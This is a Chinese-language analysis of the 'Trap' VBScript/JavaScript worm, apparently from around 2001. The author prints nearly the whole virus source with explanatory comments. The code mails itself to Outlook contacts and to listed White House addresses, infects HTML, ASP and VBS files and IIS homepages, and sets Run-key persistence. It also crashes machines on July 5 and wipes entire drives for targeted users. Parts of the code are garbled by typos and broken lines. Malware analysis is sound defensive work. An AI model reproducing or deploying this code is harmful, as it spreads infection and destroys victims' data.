7月初在我国出现了一种名叫“陷阱”(Trap)的新型恶性病毒,并在7月5日全面爆发,目前国内已有不少的网站和用户遭受“陷阱”的袭击,造成网络系统瘫痪、文件丟失现象严重。该病毒是一种网络脚本语言病毒,并是同时使用了VBScript
和 JavaScript
两种脚本语言编写的,通过OutLook电子邮件传播(不打开邮件也能被感染)、感染文件传播,传播能力较强,并能直接攻击Microsoft
IIS 服务器
主页文件,造成网站感染,被病毒感染的网站如有用户来访问时,同时被感染。从病毒的攻击对象来看,“陷阱”很可能是“国产”病毒,但据了解该病毒其实在6月份就首先在韩国出现。
本人非常不幸也遭遇“陷阱”的袭击,造成7月5日计算机蓝屏,于是我研究了“陷阱”的源代码,经过一番努力终于揭清了代码原理,下面就对“陷阱”的发作过程和源代码作详细的揭密。
病毒具有自身加密能力(使用 JavaScript
编码技术),使得普通用户无法看到病毒原码,但在被感染
VBS
文件中并没有加密,于是作为一个入口点,我非常轻松地得到所有源码。
'@ thank you! make use of
other person to get rid of an enemy, trap _2001
'这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”
on error resume next
dim vbscr,
fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim
whb(smailc) ’白宫相关人员邮件名单
whb(0) = "president@whitehouse.gov"
whb(1) = "vice.president@whitehouse.gov
"
whb(2) = "first.lady@whitehouse.gov"
whb(3)
= "mrs.cheney@whitehouse.gov"
'发送邮件的主題
title(0) = "Thanks for
helping me!"
title(1) = "The police
are investigating the robbery"
title(2) = "an
application for a job "
title(3) = "The aspects
of an application process pertinent to OSI"
title(4) = "What a
pleasant weather. Why not go out for a
walk?"
title(5) = "These
countries have gone / been through too many
wars"
title(6) = "We've fixed
on the 17th of April for the wedding"
title(7) = "The wind
failed and the sea returned to calmness."
title(8) = "the sitting
is open!"
title(9) = ""
defpath
= "C:\Readme.html" '
病毒文件
MAX_SIZE
= 100000 '
定义传染文件的最大尺寸
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
main
sub
main() '主程序
on error resume next
dim w_s
w_s= WScript.ScriptFullName '得到病毒文件本身的路径
if w_s = ""
then
Err.Clear
set fso =
CreateObject("Scripting.FileSystemObject")
'创建文件系统对象
if getErr then '辨认病毒状态
Randomize '初始化隨机种子
ra = int(rnd() * 7) '产生隨机数
doucment.write title(ra) '
写隨机内容
ExecuteMail '执行邮件状态时的程序
else
ExecutePage '执行
WEB 页状态时的程序
end if
else
ExecuteVbs '执行
VBS 文件状态时的程序
end if
end sub
Function getErr()
忽略错误
if Err.number<>0 then
getErr=true
Err.Clear
else
getErr=false
end if
end function
sub
ExecutePage() 'WEB
页状态时的程序
on error resume next
dim Html_Str, adi, wdf,
wdf2,wdf3,wdsf, wdsf2, vf
Vbs_Str
= GetScriptCode("vbscript") '得到
VBScript 代码
Js_Str
= GetJavaScript() '
得到 Javascript 代码
Code_Str
= MakeScript(encrypt(Vbs_str),true) '得到已加密过的脚本代码
Html_Str
= MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代码
Gf
'定义病毒文件的路径
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf
= w2 & "user.dll" '
注意 wdf 和 wdf3 两个文件非常迷惑人
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
'创建病毒文件
set vf = fso.OpenTextFile (wdf,
2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf,
2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile
(wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile
(wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile
(wdf3, 2, true)
vf.write Code_Str
vf.close
修改注册表,让病毒文件在每一次计算机启动自动执行
Writereg MSWKEY & "CurrentVersion\Run\Mdm",
wdsf, ""
Writereg MSWKEY & "CurrentVersion\RunServices\Profile",
wdsf2, ""
SendMail
'
执行发送邮件程序
Hackpage
'
执行感染网站程序
set adi = fso.Drives
for each x in adi
if
x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘
call
SearchHTML(x & "\") '执行文件感染程序
end if
next
if
TestUser then '检查用戶
Killhe
执行删除文件操作
else
if
Month(Date) & Day(Date) = "75"
then '如系统时间为
7月5日
set
vf = fso.OpenTextFile(w2 &
"75.htm", 2,true) ’创建系统攻击文件
vf.write MakeScript ("window.navigate
('c:/con/con');", false)
vf.close
Writereg
MSWKEY & "CurrentVersion\Run\75",
w2 & "75.htm", "" '自动启动
window.navigate
"c:/con/con" '立刻蓝屏,利用
Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)
else
'如不是7.5
if
fso.FileExists(w2 & "75.htm") then
fso.DeleteFile w2 & "75.htm" '
删除75.htm
end if
end if
if
fso.FileExists(defpath) then fso.DeleteFile
defpath '
删除 C:\Readme.html 病毒文件
end sub
sub
ExecuteMail() '邮件状态时执行的程序
on error resume next
Vbs_Str =
GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set
Stl = CreateObject("Scriptlet.TypeLib")
'创建
TypeLib对象
with Stl
.Reset
.Path = defpath
.Doc =
MakeHtml(encrypt(Vbs_str), true)
.Write()
'创建
C:\Readme.html 文件
end with
window.open defpath,
"trap", "width=1 height=1 menubar=no
scrollbars=no toolbar=no"
打开会隐藏的窗口
end sub
sub
ExecuteVbs() '
同理,如病毒文件是 VBS
时所执行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso =
CreateObject("Scripting.FileSystemObject")
set wvbs =
CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY &
"Windows Scripting Host\Setings\Timeout",
0, "REG_DWORD"
set vf = fso.OpenTextFile (w2
& "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or
x.DrivesType = 3 then
call SearchHTML(x &
"\")
end if
next
if TestUser then Killhe
end sub
sub
Gf() '得到系统路径
w1=fso.GetSpecialFolder(0)
& "\"
w2=fso.GetSpecialFolder(1)
& "\"
end sub
function
Readreg(key_str) '读注册表
set tmps =
CreateObject("WScript.Shell")
Readreg =
tmps.RegRead(key_str)
set tmps = Nothing
end function
function
Writereg(key_str, Newvalue, vtype) '写注册表
set tmps =
CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str,
Newvalue
else
tmps.RegWrite key_str,
Newvalue, vtype
end if
set tmps = Nothing
end function
function
MakeHtml(Sbuffer, iHTML) '创建HTML
文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="<"
& "HTML><" &
"HEAD><" &
"TITLE>" & title(ra) &
"</" &
"TITLE><" &
"/HEAD>" & _
"<BO" &
"AD>" & vbcrlf &
MakeScript(Sbuffer, iHTML) & vbcrlf & _
"<" &
"/BOAD><" &
"/HTML>"
end Function
function
MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write('<'+"
& "'SCRIPT
Language=JavaScript>\n'+" & _
"jword" &
"+'\n</'" &
"+'SCRIPT>');"
DocuWrite = DocuWrite &
vbcrlf & "document.write('<'+"
& "'SCRIPT
Language=VBScript>\n'+" & _
"nword" &
"+'\n</'" &
"+'SCRIPT>');"
MakeScript="<"
& "SCRIPT Language=JavaScript>"
& vbcrlf & "var jword = "
& _
chr(34) & encrypt(Js_Str)
& chr(34) & vbcrlf & "var nword
= " & _
chr(34) & Codestr &
chr(34) & vbcrlf & "nword =
unescape(nword);" & vbcrlf & _
"jword = unescape(jword);"
& vbcrlf & DocuWrite & vbcrlf &
"</" & "SCRIPT>"
else
MakeScript= "<"
& "SCRIPT Language=JavaScript>"
& Codestr & "</" &
"SCRIPT>"
end if
end function
function
GetScriptCode(Languages) '
得到不同脚本语言的代码
dim soj
for each soj in
document.scripts
if LCase(soj.Language) =
Languages then
if Languages = "javascript"
then
if len(soj.Text)> 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript =
GetScriptCode("javascript")
end function
function
TestUser() '检测用户过程
on error resume next
dim keys(6), i, tmpStr, Wnet
'特定用户关键词
keys(0) = "white
home"
keys(1) = "central
intelligence agency"
keys(2) = "bush"
keys(3) = "american
stock exchang"
keys(4) = "chief
executive"
keys(5) = "usa"
TestUser = false
Set
Wnet = CreateObject("WScript.Network")
'创建网络对象
'下面一共3个循环,作用一样,是检查用户的
Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。
tmpStr
= LCase(Wnet.UserName) '
for i=0 to 4
if InStr(tmpStr, keys(i))
> 0 then
TestUser=true
exit function
end if
next
tmpStr =
LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i))
> 0 then
TestUser=true
exit function
end if
next
tmpStr =
LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i))
>0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function
SendMail() '发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins,
Eaec, fm, wreg, areg,at
'首先向
OutLook
地址簿发送带能直接感染文件的已加密的病毒代码和HTML
附件
主題是隨机的,此过程与“欢乐时光“类似,所以不再描述
Randomize
at=fso.GetSpecialFolder(1)
& "\Readme.html"
set Oa =
CreateObject("Outlook.Application")
set wab =
Oa.GetNameSpace("MAPI")
for j = 1 to
wab.AddressLists.Count
eins = wab.AddressLists(j)
wreg=Readreg (HCUW & eins)
if (wreg="") then
wreg = 1
Eaec =
eins.AddressEntries.Count
if (Eaec > Int(wreg)) then
for x = 1 to Eaec
arrsm = wab.AddressEntries(x)
areg = Readreg(HCUW &
arrsm)
if (areg = "") then
set fm = wab.CreateItem(0)
with fm
ra = int(rnd() * 7)
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Attachments at
.Send
Writereg HCUW & arrsm, 1,
"REG_DWORD"
end with
end if
next
end if
Writereg HCUW & eins,
Eaec, ""
next
'下面是对指定的用户无条件发送大量病毒邮件,
从这一点可看出病毒作者对美国政府的极度不满。
for j = 1 to smailc
arrsm = whb(j)
set fm = wab.CreateItem(0)
ra = int(rnd() * 7)
with fm
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Send
end with
next
set Oa = Nothing
window.setTimeout
"SendMail()", 5000 '每隔
5 秒种重复发送
end function
sub
SearchHTML(Path) '搜索可传染文件的过程
on error resume next
dim pfo, psfo, pf, ps, pfi,
ext
if instr(Path,
fso.GetSpecialFolder(2)) > 0 then exit sub
if Path <>
"E:\" then exit sub
set pfo = fso.GetFolder(Path)
set psfo = pfo.SubFolders
for each ps in psfo
SearchHTML(ps.Path)
set pf = ps.Files
for each pfi in pf
ext =
LCase(fso.GetExtensionName(pfi.Path))
if
instr(ext, "htm") > 0 or ext =
"plg" or ext = "asp" then '检查文件的扩展名是否为
htm、html、plg
如是则检查是否被感染,如未被感染则将已加密的病毒代码插入文件头,这样文件一旦执行也会执行病毒代码,而且不会影响原文件的正常执行。
if Code_Str<>""
then AddHead pfi.Path, pfi, 1
elseif
ext= "vbs" then '如是
vbs 文件,则插入未加密的病毒代码
AddHead pfi.Path,pfi, 2
end if
next
next
end sub
sub
Killhe() '全盘删除文件过程
on error resume next
dim codeText, ko,adi, kd, kh,
ks,kf,kfs
codeText = "@ECHO
OFF" & vbcrlf & "PATH "
& w1 & "COMMAND" & vbcrlf
&_
"DELTREE
c:\" '将删除C盘的命令插入Autoexec.bat
中,下次开机时,删除整个硬盘,并沒有任何提示
set ko =
fso.OpenTextFile("C:\Autoexec.bat", 8,
true)
ko.Write vbcrlf &
codeText
ko.Close
'接着立刻删除其它盘的所有文件
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 then
set kd = fso.GetFolder(x
& "\")
set kfs = kd.Files
for each kf in kfs
kf.Delete
next
set ks = kd.SubFolders
for each kh in ks
kh.Delete
next
end if
next
do
while 1 '让系统立刻死机
window.open ""
loop
end sub
sub
Hackpage() '
此过程是直接攻击 Mircosoft IIS
服务器主页过程
dim fi
H = "C:\InetPut\wwwroot"
if fso.FolderExists(H) then
'判断是否为网站,如是则将已加密的带病毒代码插入文件头,从而直接传染浏览该网站的用户
set
fi = fso.GetFile(H & "\index.htm")
AddHead H & "\index.htm",fi,1
end if
end sub
sub
AddHead(Path, f, t) '此过程是病毒传染文件具体过程
on error resume next
dim tso, buffer,sr
if f.size > MAX_SIZE then
exit sub '传染大小小于100K的文件
set tso =
fso.OpenTextFile(Path, 1, true)
buffer = tso.ReadAll()
tso.close
if (t = 1) then
if UCase(Left(LTrim(buffer),
7)) <> "<SCRIPT" then
set tso =
fso.OpenTextFile(Path, 2, true)
tso.Write Code_Str &
vbcrlf & buffer '插入到文件头
tso.close
end if
else
if mid(buffer, 3, 2) <>
"'@" then
tso.close
sr=w2 & "user.dll"
if fso.FileExists(sr) then
fso.CopyFile sr, Path
end if
end if
end sub
虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。
【设为首页】
【
【